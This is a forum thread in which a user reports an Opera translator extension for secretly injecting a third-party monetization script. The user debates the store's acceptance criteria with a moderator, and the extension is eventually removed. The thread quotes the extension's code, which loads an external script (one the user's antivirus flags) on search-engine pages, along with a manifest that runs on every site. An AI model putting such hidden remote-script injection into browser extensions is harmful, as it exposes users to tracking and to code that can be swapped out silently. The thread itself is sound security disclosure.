Do more on the web, with a fast and secure browser!

Download Opera browser with:

  • built-in ad blocker
  • battery saver
  • free VPN
Download Opera

Report extension

  • I found an extension that secretly collects info about my internet usage (site navigation, etc) and serves that to a third party to monetize the extension. It was actually worse, as some versions before, it used to hijack the google ads on the google webpage to display their own ads, and replaced some of the results on the search with those ads, but I think that was too aggressive and was removed on later versions. That behavior is not disclosed anywhere on the extension page, and I only noticed that because my antivirus accused it, and because of the whole google ads thing.

    Is that behavior allowed on extensions? If it is, I think it should be disclosed somewhere on the extension page because the extension that I'm talking about is one that translates the page using the google translator (https://addons.opera.com/en/extensions/details/translator/) and has more than 3.000.000 downloads, so it's very popular.

    Aside from that, I couldn't find a way to report the extension anywhere, and I'm losing my trust on opera extensions, because of those securities reasons. Imagine now that more than 3.000.000 users are, without knowing, giving possibly sensitive data to third-party companies to do whatever they want with it, and to make it worse, I simply can't find anywhere a way to report that extension.

    Is that a way to/should I report it?

  • In the extensions permissions, it's said that the your navigation data can be used. And the description of the extension also says that third party translation services are used.

  • @leocg Translation services are different from tracking/monetization services, which is my initial complaining.

    He uses http://monetizus.com/solutions.php, which is a third party service for monetization. Looking through the extension source code, you can see on the file "includes/user_js.js", line 658 that if the URL contains one of the following words, it injects the monetizus script: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube.

    But, if I understood correctly from your message, do you allow me to create a new extension that allows you to translate text on any website, but secretly steal your passwords from facebook, google, etc? Because that's what I'm understanding from your "it's said that the your navigation data can be used" sentence. If that's the case, then I'm going back to chrome, thanks! At least they have a good policy with their extensions (and easily allow us to report them). I thought that a big company like Opera would value more the security of your users...

    It's understandable that people making extensions should have a way to monetize their content, but it should be done in a way that my doesn't risk my personal data

  • https://dev.opera.com/extensions/publishing-guidelines/#acceptance-criteria

    There you will find the criteria for an extension to be accepted. Of course stealing passwords is not allowed.

    And Opera is probably the browser that more takes users's security into consideration, making some of them even complain about the excess of security sometimes.

  • @leocg said in Report extension:

    And Opera is probably the browser that more takes users's security into consideration, making some of them even complain about the excess of security sometimes.

    If that is really the case, you should probably have an easy way to report extensions that doesn't behave, right? And from the impression you are giving me, It doesn't really sound like your statement is true, seeing that from the link you posted, at least 5 criteria were broken, and still you are treating me with disbelief 🤦♂

    It must not collect private information without authorization from the user.

    The extension does not ask for consent in any way and still loads monetizus, which, as I said earlier, is a monetization service included on the extension. From the service webpage, here are some of those features, which tracks the user:

    • In-image: Monetize the most viewed and beloved content. Monetizus solution parses images by pixel to determine what’s in every image and drive relevant promotional materials to your audience.
    • Price Suggestor: [...] Fast and relevant search through the tons of products collects and drives the fairest results with the cheapest prices, depending on your user's activity.
    • Interstitial: [...] Monetize the time, users spend on the website with Monetizus.

    And, well, it is a monetization service, so there's probably more tracking under the hood...

    It must not change referral parameters, interfere with Opera monetization mechanisms or otherwise misappropriate traffic or revenues from other sources.

    It could misappropriate traffic or revenues from other sources using some of the features of the same service said above. All of the services provided by Monetizus goes against this topic, and you can check them here. I'm not saying that the extension uses all of them, but the script that is loaded on the extension definitely has all those capabilities, and it is up to the Monetizus service to really decide if they will or not apply those services.

    No external JavaScript is allowed. All JavaScript code must be contained in the extension. External APIs are ok.

    As I said in the first post, the extension has the following code on the includes/user_js.js file:

    if (window.location.href.match(/[a-z]+:\/\/(www\.)?(bing|google|yandex|baidu|search\.yahoo|duckduckgo|qwant|nova\.rambler|youtube)\.[a-z]+(\/|$)/i))
    {
        console.log("demo mode: include monetizus plugin.");
        var monetizer_script = document.createElement("SCRIPT");
        monetizer_script.src = "//s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js";
        var firstScript = document.getElementsByTagName("SCRIPT")[0];
        firstScript.parentNode.insertBefore(monetizer_script, firstScript);
    }
    

    I don't know if you understand this code, but it is essentially inserting the script s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js if the URL contains one of the following words, it injects the monetizus script: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube. The code is delivered through an online address, so if monetizus decides to change the content of this script to do exactly what I said on the last post (secretly steal your passwords from facebook, google, etc), they could easily do it at any time, and you wouldn't even notice... I should probably state too that the URL s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js Is reported by my antivirus (Kaspersky) as a dangerous URL.

    Ads in content scripts are not allowed.

    As I said, the monetizus script is loaded on the includes/user_js.js file, and as you can see on the manifest, it is included on the content_scripts section:

    "content_scripts": [ {
          "all_frames": true,
          "js": [ "includes/user_js.js" ],
          "matches": [ "*://*/*" ],
          "run_at": "document_end"
       } ],
    

    While linking to your own or other sites from your extension is fine, such links should be relevant and have a clear function. Don’t overload the extension with promotional links.

    A monetization/tracking service is definitely not relevant to the user of the extension, especially when being secretly bundled with a translating extension.

    So, again, can you please stop treating me with disbelief and offer some help? That is really annoying, as I'm trying to report a security issue to make Opera better, and those actions only discourage people from doing it...

  • Maybe someday they will have a better system to report extensions. For now, I guess you can use this forum.

  • @leocg So, how can i proceed?

  • I guess you already did what you can do by opening this topic.

  • @leocg Well, can't you do something about it? Or at least pass that to someone who can?

  • I will see if I can do something.

  • @leocg Thanks! Keep me updated, please!

  • The extension seems to be removed.

  • @leocg Nice! Thanks!

    I just wished this whole process could be less tiresome and time-consuming on my end you know, because I'm not the only one who should be looking for security issues like that, and with all the trouble I had to go through to just make a simple and obvious report, I think it just discourages people to do the same.

    I don't know how and when Opera checks for issues on extensions that are submitted or updated, but I expected that at least the acceptance criteria would be thoroughly checked, which, as I see with that extension, was not the case at all. This issue gets amplified seeing the reach of that extension, which is on the top 10 recommended extensions and is first one on the translation category. How an extension like this gets recommended by your team?

    Along with that, an easier way to report an extension, which would not require me to dissect the extension source code and your acceptance criteria to look for issues would definitely be great...

  • Next time you can use https://security.opera.com/report-security-issue/

    Choose web services and then addons.opera.com